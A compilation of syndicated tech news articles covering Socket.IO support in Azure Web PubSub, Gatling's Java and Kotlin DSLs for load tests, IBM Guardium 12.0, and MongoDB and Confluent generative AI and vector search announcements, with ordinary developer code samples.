By bringing Socket.IO to Azure, Microsoft relieves developers of handling scaling and implementing the code logic related to using an adapter.

Simple Overview of Web PubSub for Socket.IO (Source: Microsoft Learn)

Client code connecting to Web PubSub for Socket.IO would look like:

/*client.js*/

const io = require("socket.io-client");
// The Web PubSub for Socket.IO service endpoint goes in the first argument
const socket = io("", {
    path: "/clients/socketio/hubs/Hub",
});

// Receives a message from the server
socket.on("hello", (arg) => {
    console.log(arg);
});

// Sends a message to the server
socket.emit("howdy", "stranger")

While code for a Socket.IO server integrated with Web PubSub for Socket.IO would look like:

/*server.js*/

const { Server } = require("socket.io");
const { useAzureSocketIO } = require("@azure/web-pubsub-socket.io");

let io = new Server(3000);

// Use the following line to integrate with Web PubSub for Socket.IO
useAzureSocketIO(io, {
    hub: "Hub", // The hub name can be any valid string.
    connectionString: process.argv[2]
});

io.on("connection", (socket) => {

    // Sends a message to the client
    socket.emit("hello", "world");

    // Receives a message from the client
    socket.on("howdy", (arg) => {
        console.log(arg);   // Prints "stranger"
    });
});

Kevin Guo, a product manager at Microsoft, explained in a Socket.IO blog post:

What’s more important is that server and client apps continue using the same and familiar Socket.IO APIs. With only a few lines of code, you can get any socket.io apps running locally to Azure.

In addition, David Fowler, a distinguished engineer at Microsoft working on .NET, tweeted:

We added socket io support natively on Azure! Of course, I prefer SignalR, but for the nodejs apps out there, this can significantly reduce the complexity of scaling your http://socket.io based applications.

Since Socket.IO support is hosted in Azure Web PubSub, pricing and availability details are available on the Azure Web PubSub pricing page.




Gatling Supports Java DSL for Java and Kotlin Based Performance Tests

MMS Founder
MMS Johan Janssen

Article originally posted on InfoQ. Visit InfoQ

The load testing tool Gatling is designed for ease of use, maintainability and performance. It originally provided a Scala DSL to write test scenarios. Some time ago, a Java DSL was released making it possible to write test scenarios in Java or Kotlin.

Having dedicated a paragraph of their Quickstart to Picking the Right Language, Gatling recommends using Scala or Kotlin for writing tests for developers who already use one of those languages. Otherwise, Java is recommended because it’s widely known, requires less CPU for compiling and is easier to configure in Maven or Gradle.

Java, Kotlin or Scala: Which Gatling Flavor is Right for You?, an article published one year after the release of the Java DSL, shows that 35 percent of users work with the Java DSL. In the article, Gatling clearly states that despite the quick popularity of the Java DSL, they plan to keep supporting the Scala DSL, and users are free to choose between Java, Scala and Kotlin for their tests.

Consider a traditional test scenario in Scala where eight users ramp up gradually over ten seconds: zero users at zero seconds, four users after five seconds, and eight users after ten seconds. Each user then executes a loop five times to verify that both the car and the carpart endpoints return an HTTP status code 200:

class BasicSimulationScala extends Simulation {
    val httpProtocol = http
        .baseUrl("http://localhost:8080");

    val scn = scenario("BasicSimulation")
        .repeat(5){  
             exec(http("car").get("/car")
            .check(status.is(200)))
            .pause(1)
            .exec(http("carpart")
            .get("/carpart")
            .check(status.is(200)))
        }

    setUp(
        scn.inject(rampUsers(8).during(10))
    ).protocols(httpProtocol);
}

The test may be run with the Gatling script on Linux/Unix:

$GATLING_HOME/bin/gatling.sh

Or on Windows:

%GATLING_HOME%\bin\gatling.bat

Alternatively, build tools such as Maven can be used to run the test by specifying the directory of the scenario in testSourceDirectory and configuring the Scala Maven Plugin and the Gatling Maven plugin:


<build>
    <testSourceDirectory>src/test/scala</testSourceDirectory>
    <plugins>
        <plugin>
            <groupId>net.alchim31.maven</groupId>
            <artifactId>scala-maven-plugin</artifactId>
            <version>${scala-maven-plugin.version}</version>
            <executions>
                <execution>
                    <goals>
                        <goal>testCompile</goal>
                    </goals>
                    <configuration>
                        <jvmArgs>
                            <jvmArg>-Xss100M</jvmArg>
                        </jvmArgs>
                        <args>
                            <arg>-deprecation</arg>
                            <arg>-feature</arg>
                            <arg>-unchecked</arg>
                            <arg>-language:implicitConversions</arg>
                            <arg>-language:postfixOps</arg>
                        </args>
                    </configuration>
                </execution>
            </executions>
        </plugin>
        <plugin>
            <groupId>io.gatling</groupId>
            <artifactId>gatling-maven-plugin</artifactId>
            <version>${gatling-maven-plugin.version}</version>
        </plugin>
    </plugins>
</build>

Finally, the test can be executed:

mvn gatling:test

The same scenario can be expressed with the Java DSL where: Duration.ofSeconds(10) should be used instead of 10; status() instead of status; and repeat(5).on(...) instead of repeat(5){...}:

public class BasicSimulationJava extends Simulation {

    HttpProtocolBuilder httpProtocol = http
        .baseUrl("http://localhost:8080");

    ScenarioBuilder scn = scenario("BasicSimulation")
        .repeat(5).on(
            exec(http("car").get("/car")
            .check(status().is(200)))
            .pause(1)
            .exec(http("carpart")
            .get("/carpart")
            .check(status().is(200)))
        );

    {
        setUp(
            scn.injectOpen(rampUsers(8).during(Duration.ofSeconds(10)))
        ).protocols(httpProtocol);
    }
}

While these changes between the Scala DSL and the Java DSL seem relatively small, the biggest advantage for the users is that all the custom logic around the test may be written in Java as well.
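
As a rough illustration (the helper method, session key, and /carpart/{id} endpoint below are made up for the example, not part of the article's scenario), plain Java code can be mixed freely with the DSL:

import static io.gatling.javaapi.core.CoreDsl.*;
import static io.gatling.javaapi.http.HttpDsl.*;

import io.gatling.javaapi.core.ChainBuilder;
import java.util.concurrent.ThreadLocalRandom;

public final class CarChains {

    // Ordinary Java helper reused by the chain below.
    private static String randomPartId() {
        return String.valueOf(ThreadLocalRandom.current().nextInt(1, 100));
    }

    // Reusable chain: put a value into the virtual user's session,
    // then request a hypothetical /carpart/{id} endpoint with it.
    public static final ChainBuilder lookUpRandomPart =
        exec(session -> session.set("partId", randomPartId()))
            .exec(http("carpart by id")
                .get("/carpart/#{partId}")
                .check(status().is(200)));
}

A simulation can then chain .exec(CarChains.lookUpRandomPart) alongside the requests shown in the examples above.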

The Gatling scripts may be used to run the test, or the build tool may be used in which case the Scala plugin configuration may be removed to simplify the configuration.

The last example shows the Java DSL in Kotlin, where the biggest change is that status().shouldBe(200) should be used instead of status().is(200) in the Java example:

class BasicSimulationKotlin : Simulation() {

    val httpProtocol = http
        .baseUrl("http://localhost:8080");

    val scn = scenario("BasicSimulation")
        .repeat(5).on(
            exec(http("car").get("/car")
            .check(status().shouldBe(200)))
            .pause(1)
            .exec(http("carpart")
            .get("/carpart")
            .check(status().shouldBe(200)))
        );

    init {
        setUp(
            scn.injectOpen(rampUsers(8).during(Duration.ofSeconds(10)))
        ).protocols(httpProtocol);
    }
}

The Gatling script may be used to run the tests. Alternatively, build plugins such as the Kotlin Maven Plugin can be used after specifying the location of the test scenario file in the testSourceDirectory:


<build>
    <testSourceDirectory>src/test/kotlin</testSourceDirectory>
    <plugins>
        <plugin>
            <groupId>org.jetbrains.kotlin</groupId>
            <artifactId>kotlin-maven-plugin</artifactId>
            <version>${kotlin.version}</version>
            <executions>
                <execution>
                    <id>compile</id>
                    <goals>
                        <goal>compile</goal>
                    </goals>
                </execution>
                <execution>
                    <id>test-compile</id>
                    <goals>
                        <goal>test-compile</goal>
                    </goals>
                </execution>
            </executions>
        </plugin>
        <plugin>
            <groupId>io.gatling</groupId>
            <artifactId>gatling-maven-plugin</artifactId>
            <version>${gatling-maven-plugin.version}</version>
        </plugin>
    </plugins>
</build>

More information can be found in the documentation where every functionality is explained with examples for Scala, Java and Kotlin.




IBM Bolsters Database Security with Guardium 12.0 – IT Jungle

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

September 27, 2023

A new release of the Guardium database security software is expected to help customers detect insider threats faster and better comply with audit mandates, according to IBM. Guardium 12.0 also brings expanded support for databases and easier management in hybrid cloud environments, the company says.

IBM bought Guardium back in 2009 in order to improve its capability to monitor databases for possible security violations and SQL injection attacks. The security software helped to automate database security tasks by implementing a policy-based control layer for transactions as well as anomaly detection routines to single out potentially criminal behavior that would otherwise blend into the weeds.

That original mission is still front and center with Guardium Data Protection 12.0, which IBM announced last week and began shipping yesterday. According to IBM, the new product enables companies to detect insider threats faster, “with near real-time insights.” Enhancements to the product’s Active Threat Analytics, Risk Spotter, and real-time trust evaluator (RTTE) components are instrumental in speeding up the time to detection, the company says.

According to IBM, Guardium 12.0 also brings optimized data classification processes thanks to new catalog search rules and an “exclude” schema. Users should see more automation of the vulnerability assessment processes thanks to a new integration with ServiceNow to share vulnerability data.

On the product management front, users will benefit from better visibility into Guardium managed units and patching levels from the central manager components, as well as new health notifications for third-party software running on the Guardium appliance. This release also brings improved load balancing and traffic detection at cluster level, IBM says.

The new release brings data protection capabilities to several more databases, including Couchbase Server 7.1; DataStax Enterprise 6.8.20; EDB Postgres v15.2; Elasticsearch version 8.6.0; Microsoft SQL Server 2022; Microsoft SQL Server 2022 Azure; MongoDB Atlas Database with external S-TAP; MongoDB v6.0; Neo4j Graph Database v5.6; PostgreSQL 15; Redis v.7; Teradata v17.2; and Vertica Big Data Analytics v12. Google Big Query gets support for HTTP/2 traffic while Postgres gets support for “query rewrite.” It also supports the Watson Knowledge Catalog via user defined function, and support for Oracle database connection modules written in Python.

The product already supports all the latest versions of Db2 for IBM i, z/OS, and Linux, Unix, and Windows (LUW). While it doesn’t run on IBM i, Guardium can protect data in Db2 for i. Guardium has supported Db2 for i since 2009.

For more info, see the IBM announcement.

RELATED STORIES

IBM Beefs Up Database Security with Guardium Buy

Guardium Adds DB2/400 Support to Database Security Tool






MongoDB reveals new generative AI, vector search tools – TechTarget

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

MongoDB on Tuesday unveiled new generative AI capabilities designed to help developers more quickly and easily build applications.

Among them are natural language processing (NLP) capabilities that enable developers to interact with data without having to write code and new MongoDB Atlas Vector Search capabilities that help reduce errant model outputs.

MongoDB introduced the new features during MongoDB.local London, an in-person event for the vendor’s users.

Based in New York City, MongoDB is a database vendor that launched its NoSQL database in 2009 as an alternative to relational databases.

Dating to the 1970s, relational databases sometimes struggle to discover relationships between data points, which is becoming even more difficult as organizations collect increasing amounts of data and the data they ingest increases in complexity.

As a result, alternatives have been developed.

Graph databases such as TigerGraph and Neo4j specialize in discovering relationships between data points and are quickly gaining popularity while document-based databases such as MongoDB and Couchbase offer platforms designed to work with large sets of distributed data.

In June at an event in New York, MongoDB revealed an initial set of generative AI capabilities. The features unveiled on Tuesday build on those initial features and move some from the development stage into preview.

New AI capabilities

Like most tech vendors, MongoDB has made generative AI a focal point of its product development since OpenAI’s launch of ChatGPT in November 2022 significantly advanced generative AI and large language model functionality.

In June, the vendor unveiled its first generative AI capabilities, including an extension of its partnership with Google Cloud that will enable developers to use the tech giant’s generative AI and LLM capabilities as they create applications in MongoDB Atlas.

Now, MongoDB is introducing specific generative AI tools that let users interact with data using natural language rather than code. They include the following:

  • Natural language query in MongoDB Compass that lets users generate queries and infuse data assets in applications.
  • Natural language visualization in MongoDB Atlas Charts so developers can create, share and embed visualizations.
  • An AI-powered chatbot in MongoDB Documentation that provides users with tutorials, code samples and reference libraries as they build applications with MongoDB.

The chatbot is now generally available, while the NLP capabilities in Compass and Atlas Charts are in preview.

The features are similar to those being developed by other data management and analytics vendors, according to Stephen Catanzano, an analyst at TechTarget’s Enterprise Strategy Group.

But they are nevertheless important given that they lessen the burden on data workers. In addition, whether one vendor’s NLP capabilities are stronger than another’s won’t really be known until all the tools are generally available, he noted.

“MongoDB, like other vendors, is integrating generative AI into their products to reduce the manual and repetitive tasks,” Catanzano said. “These functions are similar to what others are doing, but there may be more nuances once we can see the full implementation on how they are doing this versus others.”

Beyond NLP capabilities, MongoDB unveiled new AI-powered capabilities in MongoDB Relational Migrator that make it faster and easier for organizations to migrate data from relational and other database types to MongoDB. The vendor first made Relational Migrator generally available in June; the capabilities added now, which are in preview, automatically convert SQL queries to MongoDB Query API syntax.

Meanwhile, improvements to MongoDB Atlas Vector Search — a tool also still in preview — are designed to reduce the frequency of AI hallucinations that plague generative AI and LLM outputs.

They include a dedicated data aggregation stage to filter results, accelerated indexing that shows metadata and other information that reveal data’s lineage and whether it can be trusted, and faster and easier access to streaming data to enable real-time analysis from generative AI models.

Because vector search can reduce AI hallucinations, MongoDB’s move to add functionality to Atlas Vector Search is critical, according to Catanzano.

He noted that vectors enable LLMs to identify similarity among data. Through identifying similar data, generative AI can learn from itself and return more accurate results.
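
A minimal sketch of that retrieval step, using the $vectorSearch aggregation stage as documented for the Atlas Vector Search preview (syntax may change between releases); the index name, field names and query embedding below are assumptions for illustration:

```python
# Retrieve the documents most similar to a query embedding, pre-filtered on metadata.
from pymongo import MongoClient

articles = MongoClient("mongodb+srv://<user>:<password>@<cluster>.mongodb.net")["kb"]["articles"]

query_embedding = [0.012, -0.044, 0.231]  # placeholder; real embeddings have hundreds of dimensions

results = articles.aggregate([
    {"$vectorSearch": {
        "index": "vector_index",        # vector search index defined in Atlas
        "path": "embedding",            # document field holding the stored vectors
        "queryVector": query_embedding,
        "numCandidates": 100,
        "limit": 5,
        "filter": {"lang": "en"},       # metadata filter to narrow the candidate set
    }},
    {"$project": {"title": 1, "score": {"$meta": "vectorSearchScore"}}},
])

for doc in results:
    print(doc)
```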

“The most significant [new feature] is vector search,” Catanzano said. “Most database companies like MongoDB are adding this to support generative AI workloads. Vector search has a lot of use cases and is a must-have going forward for databases to play in the generative AI space.” 

Beyond the new capabilities in Atlas Vector Search, MongoDB unveiled an integration between Atlas Vector Search and data streaming specialist Confluent that enables developers to access streaming data for use in generative AI models.

Andrew Davidson, MongoDB’s SVP of products, said that the new capabilities in combination — which the vendor terms its intelligent developer experience — are designed to enable developers to build faster within MongoDB’s operational data layer.

Meanwhile, coming just three months after the vendor’s initial foray into generative AI, he said they represent progress from theory to practice.

“In June, we talked about how we were looking at [generative AI],” Davidson said. “Now, we’re launching a bunch of things. Back in June, we knew we wanted to do a lot of things but our plans weren’t specific. We knew we could do a bunch of things to modernize, and now we’re bringing it to life.”

Living on the edge

Beyond new generative AI capabilities — and those such as vector search that power generative AI — MongoDB also unveiled Atlas for the Edge.

Atlas for the Edge, now in preview, is a set of capabilities that lets users deploy MongoDB-based applications where data is created, processed and stored, rather than only in the vendor's database. In addition, the tool synchronizes an organization's edge data with the rest of its data so the edge data is not isolated.

Davidson noted that data can be created and stored anywhere from an IoT sensor or point-of-sale system to a major cloud provider’s platform. Rather than force users to import that data into MongoDB to train models and inform other applications — including generative AI — the vendor is aiming to simplify development by bringing MongoDB to the data.

According to MongoDB, Atlas for the Edge enables customers to do the following:

  • Deploy MongoDB on varied infrastructure, from on-premises servers to remote locations such as warehouses or hospitals that are generally disconnected from other data sources, so that data stays connected and available for real-time analysis.
  • Run applications in locations with intermittent connectivity to prevent data loss when those locations are offline.
  • Integrate with generative AI and machine learning tools to enable development and deployment of generative AI capabilities directly in devices.
  • Store and process both real-time and batch data from IoT devices so it can be synchronized with other data in edge locations and used for predictive maintenance and anomaly detection.
  • Secure edge applications to ensure data privacy and regulatory compliance.

“We know that there’s more compute at the edge … where the business is happening,” Davidson said. “Now, we have the ability to have an edge server that synchronizes itself back up to Atlas.”
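
Assuming the pattern Davidson describes, an application at the edge would write to a local MongoDB endpoint and leave synchronization to the edge server. The sketch below is illustrative only; the local URI, database and fields are hypothetical:

```python
# Writes target the local edge endpoint, so they succeed even while the site is offline;
# the edge server (not the application) syncs data back to Atlas when connectivity returns.
from datetime import datetime, timezone
from pymongo import MongoClient

edge = MongoClient("mongodb://edge-server.local:27021")  # hypothetical local edge endpoint
readings = edge["factory"]["sensor_readings"]

readings.insert_one({
    "sensor_id": "line-3-temp",
    "value_c": 71.4,
    "recorded_at": datetime.now(timezone.utc),
})
```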

Catanzano likewise noted that the key aspect of Atlas for the Edge is that it provides a unified interface to enable development where business happens.

Previously, customers could build their own tools to deploy MongoDB in varied environments and then synchronize the data created in those varied environments. Now, MongoDB is doing that for them.

“They have expanded Atlas to the Edge with a single user interface that connects all edge devices, which was not easily done before this improvement,” Catanzano said. “It’s an important update and improvement for large scale deployments such as kiosks and IoT devices.”

Looking ahead, Davidson said MongoDB’s roadmap will center on adding performance and scalability while at the same time making its tools easier to use.

Beyond generative AI, time series analysis and stream processing are specific areas of focus. But at the core of the vendor’s product development planning is simplification.

Catanzano, meanwhile, said MongoDB’s focus on generative AI and streaming data is appropriate.

“They are moving quickly on generative AI, streaming data and important use cases,” he said.

Eric Avidon is a senior news writer for TechTarget Editorial and a journalist with more than 25 years of experience. He covers analytics and data management.

Article originally posted on mongodb google news. Visit mongodb google news





New MongoDB Atlas Vector Search Capabilities Help Developers Build and Scale AI Applications

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

MongoDB, Inc. (NASDAQ: MDB) announced new capabilities, performance improvements, and a data-streaming integration for MongoDB Atlas Vector Search that make it even faster and easier for developers to build generative AI applications. Organizations of all sizes have rushed to adopt MongoDB Atlas Vector Search as part of a unified solution to process data for generative AI applications since being announced in preview in June of this year.

MongoDB Atlas Vector Search has made it even easier for developers to aggregate and filter data, improving semantic information retrieval and reducing hallucinations in AI-powered applications. With new performance improvements for MongoDB Atlas Vector Search, the time it takes to build indexes is now significantly reduced by up to 85 percent to help accelerate application development.

Additionally, MongoDB Atlas Vector Search is now integrated with fully managed data streams from Confluent Cloud to make it easier to use real-time data from a variety of sources to power AI applications. To learn more about MongoDB Atlas Vector Search, visit mongodb.com/products/platform/atlas-vector-search.

“It has been really exciting to see the overwhelmingly positive response to the preview version of MongoDB Atlas Vector Search as our customers eagerly move to incorporate generative AI technologies into their applications and transform their businesses—without the complexity and increased operational burden of ‘bolting on’ yet another software product to their technology stack. Customers are telling us that having the capabilities of a vector database directly integrated with their operational data store is a game changer for their developers,” said Sahir Azam, Chief Product Officer at MongoDB. “This customer response has inspired us to iterate quickly with new features and improvements to MongoDB Atlas Vector Search, helping to make building application experiences powered by generative AI even more frictionless and cost effective.”

Many organizations today are on a mission to invent new classes of applications that take advantage of generative AI to meet end-user expectations. However, the large language models (LLMs) that power these applications require up-to-date, proprietary data in the form of vectors—numerical representations of text, images, audio, video, and other types of data. Working with vector data is new for many organizations, and single-purpose vector databases have emerged as a short-term solution for storing and processing data for LLMs.

However, adding a single-purpose database to their technology stack requires developers to spend valuable time and effort learning the intricacies of developing with and maintaining each point solution. For example, developers must synchronize data across data stores to ensure applications can respond in real time to end-user requests, which is difficult to implement and can significantly increase complexity, cost, and potential security risks.

Many single-purpose databases also lack the flexibility to run as a managed service on any major cloud provider for high performance and resilience, severely limiting long-term infrastructure options. Because of these challenges, organizations from early-stage startups to established enterprises want the ability to store vectors alongside all of their data in a flexible, unified, multi-cloud developer data platform to quickly deploy applications and improve operational efficiency.

MongoDB Atlas Vector Search addresses these challenges by providing the capabilities needed to build generative AI applications on any major cloud provider for high availability and resilience with significantly less time and effort. MongoDB Atlas Vector Search provides the functionality of a vector database integrated as part of a unified developer data platform, allowing teams to  store and process vector embeddings alongside virtually any type of data to more quickly and easily build generative AI applications. Dataworkz, Drivly, ExTrac, Inovaare Corporation, NWO.ai, One AI, VISO Trust, and many other organizations are already using MongoDB Atlas Vector Search in preview to build AI-powered applications for reducing public safety risk, improving healthcare compliance, surfacing intelligence from vast amounts of content in multiple languages, streamlining customer service, and improving corporate risk assessment. The updated capabilities for MongoDB Atlas Vector Search further accelerate generative AI application development:

  • Increase the accuracy of information retrieval for generative AI applications: Whether personalized movie recommendations, quick responses from chatbots for customer service, or tailored options for food delivery, application end-users today expect accurate, up-to-date, and highly engaging experiences that save them time and effort. Generative AI is helping developers deliver these capabilities, but the LLMs powering applications can hallucinate (i.e., generate inaccurate information that is not useful) because they lack the necessary context to provide relevant information. By extending MongoDB Atlas’s unified query interface, developers can now create a dedicated data aggregation stage with MongoDB Atlas Vector Search to filter results from proprietary data and significantly improve the accuracy of information retrieval to help reduce LLM hallucinations in applications.
  • Accelerate data indexing for generative AI applications: Generating vectors is the first step in preparing data for use with LLMs. Once vectors are created, an index must be built for the data to be efficiently queried for information retrieval—and when data changes or new data is available, the index must then be updated. The unified and flexible document data model powering MongoDB Atlas Vector Search allows operational data, metadata, and vector data to be seamlessly indexed in a fully managed environment to reduce complexity. With new performance improvements, the time it takes to build an index with MongoDB Atlas Vector Search is now reduced by up to 85 percent to help accelerate developing AI-powered applications.
  • Use real-time data streams from a variety of sources for AI-powered applications: Businesses use Confluent Cloud’s fully managed, cloud-native data streaming platform to power highly engaging, responsive, real-time applications. As part of the Connect with Confluent partner program, developers can now use Confluent Cloud data streams within MongoDB Atlas Vector Search as an additional option to provide generative AI applications ground-truth data (i.e. accurate information that reflects current conditions) in real time from a variety of sources across their entire business. Configured with a fully managed connector for MongoDB Atlas, developers can make applications more responsive to changing conditions and provide end user results with greater accuracy.

Organizations Already Innovating with MongoDB Atlas Vector Search in Preview

Dataworkz enables enterprises to harness the power of LLMs on their own proprietary data by combining data, transformations, and AI into a single experience to produce high-quality, LLM-ready data. “Our goal is to accelerate the creation of AI applications with a product offering that unifies data, processing, and machine learning for business analysts and data engineers,” said Sachin Smotra, CEO and co-founder of Dataworkz. “Leveraging the power of MongoDB Atlas Vector Search has allowed us to enable semantic search and contextual information retrieval, vastly improving our customers’ experiences and providing more accurate results. We look forward to continuing using Atlas Vector Search to make retrieval-augmented generation with proprietary data easier for highly relevant results and driving business impact for our customers.” 

Drivly provides commerce infrastructure for the automotive industry to programmatically buy and sell vehicles through simple APIs. “We are using AI embeddings and Atlas Vector Search to go beyond full-text search with semantic meaning, giving context and memory to generative AI car-buying assistants,” said Nathan Clevenger, Founder and CTO at Drivly. “We are very excited that MongoDB has added vector search capabilities to Atlas, which greatly simplifies our engineering efforts.”

ExTrac draws on thousands of data sources identified by domain experts, using AI-powered analytics to locate, track, and forecast both digital and physical risks to public safety in real-time. “Our domain experts find and curate relevant streams of data, and then we use AI to anonymize and make sense of it at scale. We take a base model and fine-tune it with our own labeled data to create domain-specific models capable of identifying and classifying threats in real-time,” said Matt King, CEO of ExTrac. “Atlas Vector Search is proving to be incredibly powerful across a range of tasks where we use the results of the search to augment our LLMs and reduce hallucinations. We can store vector embeddings right alongside the source data in a single system, enabling our developers to build new features way faster than if they had to bolt-on a standalone vector database—many of which limit the amount of data that can be returned if it has meta-data attached to it. Because the flexibility of MongoDB’s document data model allows us to land, index, and analyze data of any shape and structure—no matter how complex—we are now moving beyond text to vectorize images and videos from our archives dating back over a decade. Being able to query and analyze data in any modality will help us to better model trends, track evolving narratives, and predict risk for our customers.”

Inovaare Corporation is a leading provider of AI-powered compliance automation solutions for healthcare payers. “At Inovaare Corporation, we believe that healthcare compliance is not just about meeting regulations but transforming how healthcare payers excel in the entire compliance lifecycle. We needed a partner with the technological prowess and one who shares our vision to pioneer the future of healthcare compliance,” said Mohar Mishra, CTO and Co-Founder at Inovaare Corporation. “MongoDB’s robust data platform, known for its scalability and agility, perfectly aligns with Inovaare’s commitment to providing healthcare payers with a unified, secure, and AI-powered compliance operations platform. MongoDB’s innovative Atlas Vector Search powers the reporting capabilities of our products. It allows us to deliver context-aware compliance guidance and real-time data-driven insights.”

NWO.ai is a premier AI-driven Consumer Intelligence platform helping Fortune 500 brands bring new products to market. “In today’s rapidly evolving digital age, the power of accurate and timely information is paramount,” said Pulkit Jaiswal, Cofounder of NWO.ai. “At NWO.ai, our flagship offering, Worldwide Optimal Policy Response (WOPR), is at the forefront of intelligent diplomacy. WOPR harnesses the capabilities of AI to navigate the vast oceans of global narratives, offering real-time insights and tailored communication strategies. This not only empowers decision-makers but also provides a vital counterbalance against AI-engineered disinformation. We’re thrilled to integrate Atlas Vector Search into WOPR, enhancing our ability to instantly search and analyze embeddings for our dual-use case. It’s an exciting synergy, and we believe it’s a testament to the future of diplomacy in the digital age.”

One AI is a platform that offers AI Agents, Language Analytics, and APIs, enabling seamless integration of accurate, production-ready language capabilities into products and services. “Our hero product – OneAgent – facilitates trusted conversations through AI agents that operate strictly upon company-sourced content, secured with built-in fact-checking,” said Amit Ben, CEO and Founder of One AI. “With MongoDB Atlas, we’re able to take source customer documents, generate vector embeddings from them that we then index and store in MongoDB Atlas Vector Search. Then, when a customer has a question about their business and asks one of our AI agents, Atlas Vector Search will provide the chatbot with the most relevant data and supply customers with the most accurate answers. By enabling semantic search and information retrieval, we’re providing our customers with an improved and more efficient experience.”
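
The flow One AI describes is a common retrieval-augmented generation pattern. As a hedged sketch, not One AI's implementation, with embed() and generate() standing in for whatever embedding model and LLM an application uses, and with hypothetical collection and index names:

```python
from pymongo import MongoClient

docs = MongoClient("mongodb+srv://<user>:<password>@<cluster>.mongodb.net")["support"]["articles"]

def embed(text: str) -> list[float]:
    """Placeholder for an embedding model call."""
    raise NotImplementedError

def generate(prompt: str) -> str:
    """Placeholder for an LLM call."""
    raise NotImplementedError

def answer(question: str) -> str:
    # Retrieve the documents most relevant to the question from Atlas Vector Search.
    hits = docs.aggregate([
        {"$vectorSearch": {
            "index": "vector_index",
            "path": "embedding",
            "queryVector": embed(question),
            "numCandidates": 200,
            "limit": 3,
        }},
        {"$project": {"body": 1}},
    ])
    context = "\n\n".join(h["body"] for h in hits)
    # Grounding the prompt in retrieved content is what helps reduce hallucinations.
    return generate(f"Answer using only this context:\n{context}\n\nQuestion: {question}")
```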

VISO Trust puts reliable, comprehensive, actionable vendor security information directly in the hands of decision-makers who need to make informed risk assessments. “At VISO Trust, we leverage innovative technologies to continue our growth and expansion in AI and security. Atlas Vector Search, combined with the efficiency of AWS and Terraform integrations, has transformed our platform,” said Russell Sherman, Cofounder and CTO at VISO Trust. “With Atlas Vector Search, we now possess a battle-tested vector and metadata database, refined over a decade, effectively addressing our dense retrieval requirements. There’s no need to deploy a new database, as our vectors and artifact metadata can be seamlessly stored alongside each other.”


Article originally posted on mongodb google news. Visit mongodb google news



Confluent’s Data Streaming for AI initiative aims to boost AI app development | InfoWorld

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

Managed Apache Kafka service provider Confluent has launched a new initiative, dubbed Data Streaming for AI, to help enterprises develop applications based on real-time data, including generative AI use cases.

The initiative is built on Confluent’s real-time streaming data engine, which will allow enterprises to make real-time contextual inferences on curated, governed, trustworthy data. These inferences can later be streamed to vector databases, AI-powered applications, and any other AI-based systems.

In order to enable enterprise users to connect to various vector databases with contextual data, Confluent has partnered with MongoDB, Pinecone, Rockset, Weaviate, and Zilliz.

“Vector databases are especially important as they can store, index, and augment large data sets in formats that AI technologies like LLMs require,” the company said in a news announcement, adding that these integrations can be used via Confluent Cloud’s fully managed data streams.
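
The managed integrations rely on Confluent Cloud's fully managed connectors, so no application code is required. Purely to illustrate the underlying data flow, a hand-rolled consumer that keeps a vector-indexed MongoDB collection in sync with a stream of embedding events might look like the following; the topic, message fields and connection details are assumptions:

```python
import json

from confluent_kafka import Consumer
from pymongo import MongoClient

docs = MongoClient("mongodb+srv://<user>:<password>@<cluster>.mongodb.net")["kb"]["articles"]

consumer = Consumer({
    "bootstrap.servers": "<broker>",
    "group.id": "vector-ingest",
    "auto.offset.reset": "earliest",
})
consumer.subscribe(["article-embeddings"])

while True:
    msg = consumer.poll(1.0)
    if msg is None or msg.error():
        continue
    event = json.loads(msg.value())
    # Keep the stored document and its embedding in step with the latest event.
    docs.update_one(
        {"_id": event["id"]},
        {"$set": {"body": event["body"], "embedding": event["embedding"]}},
        upsert=True,
    )
```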

The company is expected to add more such partners in the coming months via its Connect with Confluent program.

The company is also partnering with cloud service providers, such as Google Cloud and Microsoft Azure, to develop integrations, proofs of concept and go-to-market strategies around AI.

“Confluent plans to leverage Google Cloud’s generative AI capabilities to improve business insights and operational efficiencies for retail and financial services customers,” it said. In addition, the company is planning to create a Microsoft Copilot template to enable AI assistants to perform business transactions and provide real-time updates.

Confluent AI Assistant to provide suggestions, generate code

To provide suggestions and generate code, the company is offering a Confluent AI Assistant, which can be accessed via the Confluent Cloud Console.

The AI-based assistant can help teams get contextual answers they need to speed up engineering innovations on Confluent, the company said, adding that the assistant can also be used to generate code.

“The assistant provides responses by combining publicly available information, such as Confluent documentation, with contextual customer information to provide specific, timely responses,” the company said.

The Confluent AI assistant is expected to be made available in 2024 at no additional cost, a company spokesperson said.

Further, the company said that it will add a series of updates to its newly released Flink service for Confluent Cloud that brings AI capabilities to Flink SQL.


Article originally posted on mongodb google news. Visit mongodb google news



New MongoDB Atlas Vector Search Capabilities Help Developers Build and Scale AI … – Datanami

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

LONDON, Sept. 26, 2023 — MongoDB, Inc. today at MongoDB.local London announced new capabilities, performance improvements, and a data-streaming integration for MongoDB Atlas Vector Search that make it even faster and easier for developers to build generative AI applications.

Organizations of all sizes have rushed to adopt MongoDB Atlas Vector Search as part of a unified solution to process data for generative AI applications since being announced in preview in June of this year. MongoDB Atlas Vector Search has made it even easier for developers to aggregate and filter data, improving semantic information retrieval and reducing hallucinations in AI-powered applications. With new performance improvements for MongoDB Atlas Vector Search, the time it takes to build indexes is now significantly reduced by up to 85 percent to help accelerate application development.

Additionally, MongoDB Atlas Vector Search is now integrated with fully managed data streams from Confluent Cloud to make it easier to use real-time data from a variety of sources to power AI applications. To learn more about MongoDB Atlas Vector Search, visit this site.

“It has been really exciting to see the overwhelmingly positive response to the preview version of MongoDB Atlas Vector Search as our customers eagerly move to incorporate generative AI technologies into their applications and transform their businesses—without the complexity and increased operational burden of ‘bolting on’ yet another software product to their technology stack. Customers are telling us that having the capabilities of a vector database directly integrated with their operational data store is a game changer for their developers,” said Sahir Azam, Chief Product Officer at MongoDB. “This customer response has inspired us to iterate quickly with new features and improvements to MongoDB Atlas Vector Search, helping to make building application experiences powered by generative AI even more frictionless and cost effective.”

Many organizations today are on a mission to invent new classes of applications that take advantage of generative AI to meet end-user expectations. However, the large language models (LLMs) that power these applications require up-to-date, proprietary data in the form of vectors—numerical representations of text, images, audio, video, and other types of data. Working with vector data is new for many organizations, and single-purpose vector databases have emerged as a short-term solution for storing and processing data for LLMs.

